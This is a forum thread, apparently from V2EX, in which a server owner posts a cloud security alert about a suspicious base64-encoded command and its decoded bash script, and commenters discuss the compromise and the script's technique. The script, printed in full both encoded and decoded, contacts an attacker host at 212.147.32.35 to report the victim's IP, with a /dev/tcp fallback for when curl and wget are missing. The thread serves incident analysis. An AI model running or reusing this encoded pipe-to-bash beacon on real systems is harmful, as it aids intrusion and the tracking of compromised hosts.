这是一个创建于 209 天前的主题,其中的信息可能已经有所发展或是发生改变。
告警信息
进程异常行为-可疑编码命令待处理
备注
该告警由如下引擎检测发现:
用户名: chrony
命令行: sh -c echo IyEvYmluL2Jhc2gKZnVuY3Rpb24gX19jdXJsKCkgewogIHJlYWQgcHJvdG8gc2VydmVyIHBhdGggPDw8JChlY2hvICR7MS8vLy8gfSkKICBET0M9LyR7cGF0aC8vIC8vfQogIEhPU1Q9JHtzZXJ2ZXIvLzoqfQogIFBPUlQ9JHtzZXJ2ZXIvLyo6fQogIFtbIHgiJHtIT1NUfSIgPT0geCIke1BPUlR9IiBdXSAmJiBQT1JUPTgwCgogIGV4ZWMgMzw+L2Rldi90Y3AvJHtIT1NUfS8kUE9SVAogIGVjaG8gLWVuICJHRVQgJHtET0N9IEhUVFAvMS4wXHJcbkhvc3Q6ICR7SE9TVH1cclxuXHJcbiIgPiYzCiAgKHdoaWxlIHJlYWQgbGluZTsgZG8KICAgW1sgIiRsaW5lIiA9PSAkJ1xyJyBdXSAmJiBicmVhawogIGRvbmUgJiYgY2F0KSA8JjMKICBleGVjIDM+Ji0KfQoKaWYgWyAteCAiJChjb21tYW5kIC12IGN1cmwpIiBdOyB0aGVuCiAgY3VybCAtbyAvZGV2L251bGwgMjEyLjE0Ny4zMi4zNS9nY2FlLzEwMS4zNy43OC4xMDgKZWxpZiBbIC14ICIkKGNvbW1hbmQgLXYgd2dldCkiIF07IHRoZW4KICB3Z2V0IC1xIC1PLSAyMTIuMTQ3LjMyLjM1L2djYWUvMTAxLjM3Ljc4LjEwOAplbHNlCiAgX19jdXJsIGh0dHA6Ly8yMTIuMTQ3LjMyLjM1L2djYWUvMTAxLjM3Ljc4LjEwOCA+L2Rldi9udWxsCmZpCgo= | base64 -d | bash
进程路径: /bin/dash
进程 ID: 26803
父进程文件路径: /usr/bin/perl
父进程 ID: 26798
事件说明: 检测模型发现您的服务器上执行的进程命令行高度可疑,很有可能与木马、病毒、黑客行为有关。
解密后的脚本
#!/bin/bash
function __curl() {
read proto server path <<<$(echo ${1//// })
DOC=/${path// //}
HOST=${server//:*}
PORT=${server//*:}
[[ x"${HOST}" == x"${PORT}" ]] && PORT=80
exec 3<>/dev/tcp/${HOST}/$PORT
echo -en "GET ${DOC} HTTP/1.0\r\nHost: ${HOST}\r\n\r\n" >&3
(while read line; do
[[ "$line" == $'\r' ]] && break
done && cat) <&3
exec 3>&-
}
if [ -x "$(command -v curl)" ]; then
curl -o /dev/null 212.147.32.35/gcae/101.37.78.108
elif [ -x "$(command -v wget)" ]; then
wget -q -O- 212.147.32.35/gcae/101.37.78.108
else
__curl http://212.147.32.35/gcae/101.37.78.108 >/dev/null
fi
 |
1
janxin 209 天前
明显被黑了...
|
 |
3
bfdh 209 天前
就发了一个 http 请求,其他啥都没干?
|
 |
5
number 209 天前  44
学到了在没有 curl 和 wget 的情况下
还可以用这种方式下载文件 |
 |
6
makia98 209 天前
检查一下 docker 镜像有没有问题,我有过服务器被一个 redis 镜像当肉鸡的经历
|
 |
8
lqc09 209 天前
你已经被干了,一般是要下载 shell 上线脚本统一管理像你这种的肉鸡
|
|
9
lqc09 209 天前
gitlab 最近刚好报了一个漏洞
|
 |
11
holinhot 209 天前
还能 dev/tcp/ 这么玩,学到了
|
 |
13
GrayXu 209 天前
/dev/tcp/的一万种用法之……
|
 |
14
mingl0280 209 天前 via Android
/dev/tcp 还能这么用
|
 |
16
cweijan 208 天前
这个脚本很酷啊
|
 |
17
jptx 208 天前
学到了,手动建立 TCP 连接,拼接 HTTP 请求头,下载文件,赶紧记笔记。我最近每次碰到各种奇技淫巧都是从各种木马里学到的
|
 |
18
vinle 208 天前 4
我感觉楼主可以忽略这个东西,让入侵者继续操作,因为从脚本来,看他的操作确实有点骚有点秀了,让他玩下去说不定会有更有趣的事情发生!
|
 |
20
villivateur 208 天前 via Android
感觉好多系统没有 /dev/tcp 这个设备
|
 |
21
mikywei 208 天前
所以云厂商无时无刻不在检测着用户的数据吗?真没安全感,感觉能随时取走用户的任何文件似的。
|
 |
22
Alexonx 208 天前 via Android
@villivateur 这个并不是一个设备,应该是 bash 提供的 feature ,允许通过这种方式发起 socket 连接。实际上这个设备应该是不存在的.....用其他 shell 也不一定能跑
|
 |
23
ipeony OP @vinle #18 老实说我没发现有什么影响,当然可能数据泄漏光了(然而也没啥敏感的东西),或者被拿来挖矿(也没发现这个迹象),又或者上面有人提到的拿来 CC 别人(已经被我精致访问外网了
|
 |
24
sola97 208 天前
这个 curl 保存了
|
 |
25
cz5424 208 天前
值得学习的一个 bash
|
 |
26
FreeEx 208 天前
收藏了,为了这个 curl 脚本
|
 |
27
ETiV 208 天前 via iPhone 2
非常魔性的写法,sentry docker-compose 部署方式下,健康检查就是用这种方式实现的…装个 curl 就这么难吗🤦♂️
https://github.com/getsentry/onpremise/blob/master/docker-compose.yml#L298 |
 |
28
Radiation 208 天前
反弹 shell 用的
|
 |
29
maskerTUI 208 天前
写这脚本的人是高手
|
 |
30
zwgf 208 天前
自己实现 curl ,这个黑阔可以
|
 |
31
scyuns 208 天前
学习了 跟着黑阔学技术
|
 |
32
oser 208 天前
有意思,学习了
|
 |
33
wellsc 208 天前
哈哈哈
|
 |
34
kwanzaa 208 天前
哈哈哈哈 学到了
|
 |
35
labulaka521 208 天前
为什么 linux 上没有 /dev/tcp 这个呢
|
|
36
labulaka521 208 天前
@labulaka521 有
|
 |
37
kugouo4 208 天前
v2ex 之跟着黑客学技术,妈妈再也不用担心容器里没有 curl 和 wget 了
|
 |
38
cxy2244186975 208 天前
乌云幸存白帽子路过……
|
 |
39
radishear 208 天前
学到了
|
 |
40
ericwood067 208 天前 1
这个脚步并没有单独干什么,只是把你的 IP 地址 101.37.78.108 上报给了他们的服务器 http://212.147.32.35/gcae/,主要是看看有没有后续操作。
|
 |
41
cache 208 天前
@labulaka521 /dev/tcp 是 bash 内置的 和 linux 没关系,换 zsh 就跑不起来了
|
 |
42
Davic1 208 天前
@ericwood067 #40 请教一下~ 哪里可以判断出 101 那个就是楼主的 Host IP 呢?
|
|
43
ericwood067 208 天前 2
@Davic1 这个脚本的作用是和主机 212.147.32.35 建立了一条 tcp 链接,然后使用 httpGet 方法访问了 /gcae/101.37.78.108 这个路径,212 主机返回的结果直接被丢进了 /dev/null 里,所以肯定不是想从 212 主机获取什么东西;/gcae 应该是 212 主机上部署的一个服务的 gateway ,所以 101 应该就是楼主的 Host Ip 。不然做这个操作就没有任何道理了。
|
|
44
Davic1 208 天前
@ericwood067 #43 感谢~
|
 |
45
zouri 208 天前
各种奇怪的用法真是活到老学到老
|
 |
46
pjntt 208 天前
感觉这个是防盗版的做法吧?校验 IP 是否被授权了?
|
 |
47
IMengXin 208 天前
阿里云一直警告我 frps.exe ,很有可能与木马、病毒、黑客行为有关。
|
 |
48
scukmh 207 天前
学到了
|
 |
49
spinecho 207 天前
m 学到了
|
Select Language